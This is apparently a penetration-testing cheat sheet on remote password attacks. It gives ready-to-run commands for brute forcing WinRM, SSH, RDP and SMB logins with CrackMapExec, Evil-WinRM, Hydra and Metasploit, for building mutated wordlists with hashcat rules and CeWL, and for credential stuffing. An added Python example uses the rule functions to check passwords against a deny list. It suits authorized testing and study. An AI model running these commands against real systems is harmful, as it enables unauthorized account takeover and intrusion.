Remote Password Attacks
Network Services
WinRM - 5985 (HTTP), 5986 (HTTPS)
CrackMapExec
# Installation
sudo apt-get -y install crackmapexec
# Usage
crackmapexec <proto> <target-IP> -u <user or userlist> -p <password or passwordlist>
crackmapexec winrm ip -u user.list -p password.list
Evil-WinRM
# Installation
sudo gem install evil-winrm
# Usage
evil-winrm -i <target-IP> -u <username> -p <password>
evil-winrm -i ip -u user -p password
SSH
Hydra
# Brute Forcing
hydra -L user.list -P password.list ssh://ip
Remote Desktop Protocol (RDP)
Hydra
# Brute Forcing
hydra -L user.list -P password.list rdp://ip
SMB
Hydra
# Brute Forcing
hydra -L user.list -P password.list smb://ip
Metasploit Framework
# Brute Forcing Module
use auxiliary/scanner/smb/smb_login
Password Mutations
Creating Wordlists
Hashcat
Function   Description
:          Do nothing.
l          Lowercase all letters.
u          Uppercase all letters.
c          Capitalize the first letter and lowercase others.
sXY        Replace all instances of X with Y.
$!         Add the exclamation character at the end.
# Generating Rule-based Wordlist
hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list
# Hashcat Existing Rules
ls /usr/share/hashcat/rules/
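The six rule functions in the table, applied as a password-policy check: this added example (not from the original page or from hashcat) rejects a proposed password that is a rule-derived variant of a banned base word. The banned words, the rule set and the function names are constructed for illustration, and rule lines are assumed to separate functions with spaces.

```python
def apply_rule(rule: str, word: str) -> str:
    """Apply one rule line to a word, left to right.

    Supports only the functions in the table above. Assumption: functions
    on a line are separated by spaces (so appending a space is not handled).
    """
    for fn in rule.split():
        if fn == ":":                         # do nothing
            continue
        if fn == "l":
            word = word.lower()
        elif fn == "u":
            word = word.upper()
        elif fn == "c":                       # first letter upper, rest lower
            word = word.capitalize()
        elif len(fn) == 3 and fn[0] == "s":   # sXY: replace every X with Y
            word = word.replace(fn[1], fn[2])
        elif len(fn) == 2 and fn[0] == "$":   # $X: append X ($! in the table)
            word += fn[1]
        else:
            raise ValueError(f"unsupported rule function: {fn!r}")
    return word


# Constructed policy data: base words to ban and the rules to expand them with.
BANNED_WORDS = ["password", "welcome"]
POLICY_RULES = [":", "c", "u", "so0", "sa@", "$!", "c so0", "c $!", "c so0 sa@ $!"]


def check_password(candidate, words=BANNED_WORDS, rules=POLICY_RULES):
    """Return (base_word, rule) if candidate is a banned variant, else None."""
    variants = {}
    for word in words:
        for rule in rules:
            # setdefault keeps the first (simplest) rule that yields a variant
            variants.setdefault(apply_rule(rule, word), (word, rule))
    return variants.get(candidate)


if __name__ == "__main__":
    for pw in ["P@ssw0rd!", "WELCOME", "Tr1cycle-Lantern"]:
        hit = check_password(pw)
        print(pw, "->", f"rejected, {hit[0]!r} via {hit[1]!r}" if hit else "accepted")
```

A password that passes a length and character-class policy can still fail this check, which is why rule-mutated variants of common words belong on a deny list.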
CeWL
# Creating Wordlist
cewl <https://Site.com> -d 4 -m 6 --lowercase -w created.wordlist
Password Reuse / Default Passwords
Credential Stuffing
# Hydra
# create a new list that separates credentials with a colon (username:password)
hydra -C <user_pass.list> <protocol>://<IP>